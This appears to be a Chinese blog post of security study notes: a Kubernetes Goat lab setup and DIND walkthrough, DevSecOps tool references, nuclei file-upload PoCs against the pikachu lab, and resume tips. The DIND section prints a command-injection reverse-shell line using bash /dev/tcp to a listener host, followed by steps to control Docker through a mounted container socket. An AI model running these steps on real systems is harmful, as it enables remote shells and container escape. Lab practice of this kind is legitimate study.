k8s云安全、devsecops等知识

📅 发布时间:2026/7/4 12:46:26 👁️ 浏览次数:
k8s云安全、devsecops等知识
1、参考课件复习云相关基础概念2、使用minikube搭建k8s集群并学习基础操作3、搭建k8s-goat靶场并参考官方文档和课件完成dind等场景的练习拿到文件则cd kubernetes-goat进入目录修改 scenarios/internal-proxy/deployment.yaml 中CPU和内存值为300M修改下面文件中映射的默认套接字scenarios/health-check/deployment.yaml修改为/var/run/docker.sock运行kubernetes-goat的K8S服务bashsetup-kubernetes-goat.sh启动应用服务的端口转发bashaccess-kubernetes-goat.sh访问1234端口就可以看到全部的场景信息搭建成功k8s-goat的DIND啊根据提示访问1231端口这是一个命令执行的页面比如下图我们执行监听ncat -lvvp 6666接下来submit反弹shell127.0.0.1;bash -c ‘bash -i /dev/tcp/192.168.40.128/6666 01’得到下图执行mount命令查看文件系统挂载情况通过 /custom/containerd/containerd.sock 可以对 Docker 进行管理查看套接字是否可用下一步下载合适工具控制docker查看目标系统的架构根据操作系统架构和docker版本下载对应的docker客户端wgethttps://download.docker.com/linux/static/stable/x86_64/docker-26.1.1.tgz-O/tmp/docker.tar.gz解压缩到临时目录tar-xvf/tmp/docker.tar.gz-C/tmp/执行 Docker 命令挂载 sock进行管理/tmp/docker/docker-Hunix:///custom/containerd/containerd.sock images4、复习devsecops相关概念和开源工具SAST工具呢可以看看Fortify和enkins集成-腾讯云开发社区、jenkins用户手册、Fortify集成-Gitlab参考基于开源工具实现软件成分分析SCA 和如何集成 Snyk 和 Bitbucket Cloud 以实现 DevSecOps参考jenkinsAcunetix实现自动化安全测试 - 菜菜聊架构 - 博客园 (cnblogs.com)、Jenkins集成AppScan实现_jenkins scan-build-CSDN博客参考IAST | 洞态文档 (dongtai.io)、IAST 扫描器 - OpenRASP 官方文档 - 开源自适应安全产品 (baidu.com)5、复习nuclei工具的使用和poc编写编写pikachu文件上传lou洞poc根据自己系统情况下载使用模板仓库nuclei-h这将显示Nuclei的帮助以下是所有支持的命令。nuclei编写pikachu靶场文件上传的poc啊这里我用了ai编写好后执行如下图手动访问以下URL末尾文件名为实际检测到的文件名Client Check:http://pp.com/vul/unsafeupload/uploads/client_20260330_1200.phpMIME Type:http://pp.com/vul/unsafeupload/uploads/server_20260330_1200.phpGetImageSize:http://pp.com/vul/unsafeupload/uploads/2026/03/30/45257169ca672ef1ed5426189047.jpg前两种上传的文件检验可执行性点击跳转网页显示phpinfogetimagesize则一片乌黑那么前两种可执行getimagesize不可执行6、认真打磨个人简历排版参照优秀简历模版基本的必要属性写清楚明白求职意向所需要的软硬实力也写明白其他软硬实力是加分项也补上有相关性的